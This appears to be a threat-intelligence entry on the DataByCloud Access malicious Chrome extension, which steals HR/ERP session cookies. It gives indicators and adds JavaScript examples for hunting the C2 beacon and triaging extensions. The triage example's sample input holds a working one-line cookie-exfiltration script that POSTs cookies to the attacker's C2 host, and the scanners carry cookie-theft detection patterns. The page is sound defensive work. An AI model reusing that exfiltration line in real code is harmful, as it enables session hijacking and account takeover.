DataByCloud Access
DataByCloud Access is a malicious Google Chrome extension identified by Socket as part of a coordinated campaign involving five extensions masquerading as productivity or access tools for enterprise HR/ERP platforms including Workday, NetSuite, and SAP SuccessFactors. The operation was assessed as likely tied to a single threat actor based on shared behaviors, common API structures, and an identical list of 23 monitored security-related Chrome extensions.
DataByCloud Access is built to steal authentication cookies and tokens and to hijack the resulting sessions. It requests the cookies, management, scripting, storage, and declarativeNetRequest permissions, scoped to the targeted enterprise platform domains. It reads the authentication cookies for those platforms and posts them with the Fetch API to attacker-controlled infrastructure at api.databycloud[.]com. Reporting states that it sends the stolen cookies every 60 seconds and checks login status on the same interval, so a fresh token is captured whenever the user re-authenticates; revoking sessions or resetting passwords therefore does not evict the attacker for long while the extension remains installed. It also keeps hijacked sessions alive by injecting the stolen cookies into subsequent HTTP requests, which is what turns cookie theft into account takeover through session hijacking.
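The 60-second exfiltration cadence and the fixed C2 host give defenders two things to hunt for in web-proxy or DNS telemetry: any contact with api.databycloud[.]com at all, and a client that contacts it on a near-constant one-minute interval. The following is an added example, not code from the Socket report or from the extension; it runs over constructed proxy log lines, and the space-separated field layout is an assumption about the log source rather than any particular product's format.

```javascript
// Added example (not code from the original report): hunt the 60-second
// cookie-exfiltration cadence described above in proxy logs.
const C2_DOMAINS = new Set(['api.databycloud.com']);

// Constructed sample proxy log, one request per line:
// "<epoch> <client-ip> <method> <host> <path> <status>"  (assumed layout)
const SAMPLE_LOG = `
1717000000 10.1.2.3 POST api.databycloud.com /collect 200
1717000030 10.1.2.3 GET  www.myworkday.com /home 200
1717000060 10.1.2.3 POST api.databycloud.com /collect 200
1717000120 10.1.2.3 POST api.databycloud.com /collect 200
1717000180 10.1.2.3 POST api.databycloud.com /collect 200
1717000185 10.1.2.9 POST api.databycloud.com /collect 200
1717000200 10.1.2.9 GET  example.com / 200
`;

function parseLog(text) {
  return text.trim().split('\n').map(line => {
    const [ts, client, method, host, path, status] = line.trim().split(/\s+/);
    return { ts: Number(ts), client, method, host, path, status: Number(status) };
  });
}

// Group requests to the C2 host by client and measure the gaps between them.
// period/tolerance are in seconds; minPeriodic is how many near-60s gaps we
// want before calling it a live implant rather than a one-off click.
function findBeacons(entries, { period = 60, tolerance = 5, minPeriodic = 2 } = {}) {
  const byClient = new Map();
  for (const e of entries) {
    if (!C2_DOMAINS.has(e.host)) continue;
    if (!byClient.has(e.client)) byClient.set(e.client, []);
    byClient.get(e.client).push(e.ts);
  }
  const findings = [];
  for (const [client, times] of byClient) {
    times.sort((a, b) => a - b);
    const deltas = times.slice(1).map((t, i) => t - times[i]);
    const periodicIntervals = deltas.filter(d => Math.abs(d - period) <= tolerance).length;
    findings.push({
      client,
      c2Hits: times.length,
      periodicIntervals,
      // Any contact with the C2 domain is already an IOC match; the cadence
      // check only ranks which hosts look like a running implant.
      verdict: periodicIntervals >= minPeriodic ? 'beaconing' : 'c2-contact',
    });
  }
  return findings;
}

console.log(findBeacons(parseLog(SAMPLE_LOG)));
```

Treat every `c2-contact` result as a host to pull the extension list from; the `beaconing` verdict just tells you which ones to look at first. The tolerance exists because proxy timestamps and service-worker scheduling will drift a few seconds around the nominal interval.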
The broader extension cluster also included variants that disrupted incident response on Workday by blocking access to key administrative and security pages, including password reset, account disablement, trusted device management, and sign-on history; the reporting attributes that behavior to related extensions such as Data by Cloud 2 and Tool Access 11 rather than specifically to DataByCloud Access. Across the campaign, anti-analysis measures included monitoring for the 23 security-focused extensions noted above, and related variants used the DisableDevtool library to hinder inspection.
The campaign affected enterprise users and organizations relying on Workday, NetSuite, and SAP SuccessFactors, with the five extensions reportedly accumulating roughly 2,300 installs before removal from the Chrome Web Store. High-confidence indicators associated with DataByCloud Access and the cluster include the C2 domain api.databycloud[.]com and the Chrome extension ID oldhjammhkghhahhhdcifmmlefibciph.
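The extension ID and the C2 domain above are the indicators to sweep installed extensions against, and the permission set described earlier (cookies plus declarativeNetRequest over the HR/ERP hosts) is what to flag when an extension has a different ID but the same shape. The following triage function is an added example, not code from the Socket report or from the extension; the manifest and the background-script fragment it runs on are constructed to resemble the behavior the page describes, and the target host list is an assumption based on the platforms named above.

```javascript
// Added example, not code from the Socket report or from the extension itself:
// triage a Chrome extension against the indicators this page describes.
const KNOWN_BAD_IDS = new Set(['oldhjammhkghhahhhdcifmmlefibciph']);
const C2_DOMAINS = ['api.databycloud.com'];
// The permission set the report says the extension requests. Together,
// cookies (read them) + declarativeNetRequest (rewrite request headers) +
// scripting (run code in pages) + management (see other extensions) is
// exactly what a cookie-stealing, session-sustaining implant needs.
const RISKY_PERMS = ['cookies', 'management', 'scripting', 'storage', 'declarativeNetRequest'];
// Assumed host list for the named platforms (Workday, NetSuite, SuccessFactors).
const TARGET_HOSTS = [/(^|\.)myworkday\.com$/, /(^|\.)workday\.com$/,
                      /(^|\.)netsuite\.com$/, /(^|\.)successfactors\.com$/];

// Constructed MV3 manifest with the permission profile described above.
const SAMPLE_MANIFEST = {
  name: 'Access helper', version: '1.0', manifest_version: 3,
  permissions: ['cookies', 'management', 'scripting', 'storage', 'declarativeNetRequest'],
  host_permissions: ['*://*.myworkday.com/*', '*://*.netsuite.com/*', '*://*.successfactors.com/*'],
  background: { service_worker: 'bg.js' },
};
// Constructed fragment standing in for the extension's background script.
const SAMPLE_SOURCE = "setInterval(() => chrome.cookies.getAll({domain: 'myworkday.com'}, cs => " +
  "fetch('https://api.databycloud.com/c', {method: 'POST', body: JSON.stringify(cs)})), 60000);";

// "*://*.myworkday.com/*" -> "myworkday.com"; "<all_urls>" is returned unchanged.
function hostFromPattern(pattern) {
  const m = pattern.match(/^[^:]+:\/\/(\*\.)?([^/]+)\//);
  return m ? m[2] : pattern;
}

// Static indicators in the extension's JavaScript: the C2 hostname and the
// cookie-reading API. Either alone is worth a look; both together is the family.
function scanSource(text) {
  const hits = [];
  for (const d of C2_DOMAINS) if (text.includes(d)) hits.push(`references C2 host ${d}`);
  if (/chrome\.cookies\.getAll\s*\(/.test(text)) hits.push('reads cookies via chrome.cookies.getAll');
  return hits;
}

function triageExtension(id, manifest, source = '') {
  const perms = new Set(manifest.permissions || []);
  const hosts = (manifest.host_permissions || []).map(hostFromPattern);
  const riskyPerms = RISKY_PERMS.filter(p => perms.has(p));
  const targetHosts = hosts.filter(h => h === '<all_urls>' || TARGET_HOSTS.some(re => re.test(h)));
  const sourceHits = scanSource(source);
  const reasons = [];
  if (KNOWN_BAD_IDS.has(id)) reasons.push(`extension id ${id} is a published IOC for this family`);
  reasons.push(...sourceHits);
  if (perms.has('cookies') && perms.has('declarativeNetRequest') && targetHosts.length)
    reasons.push(`can read cookies and rewrite requests for ${targetHosts.join(', ')}`);
  // Known ID or C2 reference is a confirmed match; the permission shape alone
  // is a lead that needs a human to look at the code.
  let severity = 'info';
  if (reasons.length) severity = 'medium';
  if (KNOWN_BAD_IDS.has(id) || sourceHits.some(r => r.startsWith('references C2'))) severity = 'high';
  return { id, severity, riskyPerms, targetHosts, reasons };
}

console.log(triageExtension('oldhjammhkghhahhhdcifmmlefibciph', SAMPLE_MANIFEST, SAMPLE_SOURCE));
```

On a Windows endpoint the inputs live under `%LOCALAPPDATA%\Google\Chrome\User Data\<Profile>\Extensions\<id>\<version>\`, where the directory name is the extension ID and `manifest.json` and the background script sit beside it; feed each directory to `triageExtension` with its ID. Removal from the Chrome Web Store does not uninstall already-deployed copies, so a sweep of endpoints is still needed after the store takedown.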
Recent activity
3 sources tracked across advisories, community write-ups, and news.
Malicious Chrome extension family used to steal authentication cookies/tokens for Workday/NetSuite/SuccessFactors, maintain and refresh hijacked sessions, and (in some variants) disrupt incident response by blocking access to key Workday security/admin pages via DOM manipulation and forced redirects. Includes anti-analysis (devtools disabling) in at least one variant.
A malicious Chrome extension family posing as enterprise productivity tooling. It continuously exfiltrates session cookies/tokens (e.g., _session) to attacker-controlled C2 infrastructure to enable ongoing session hijacking and account takeover, including bypassing MFA when combined with cookie injection techniques in related variants.
Malicious Google Chrome extension masquerading as HR/ERP productivity tooling; steals authentication cookies/tokens from targeted SaaS domains (e.g., Workday/NetSuite/SuccessFactors) and exfiltrates them periodically to attacker infrastructure to enable session hijacking/account takeover.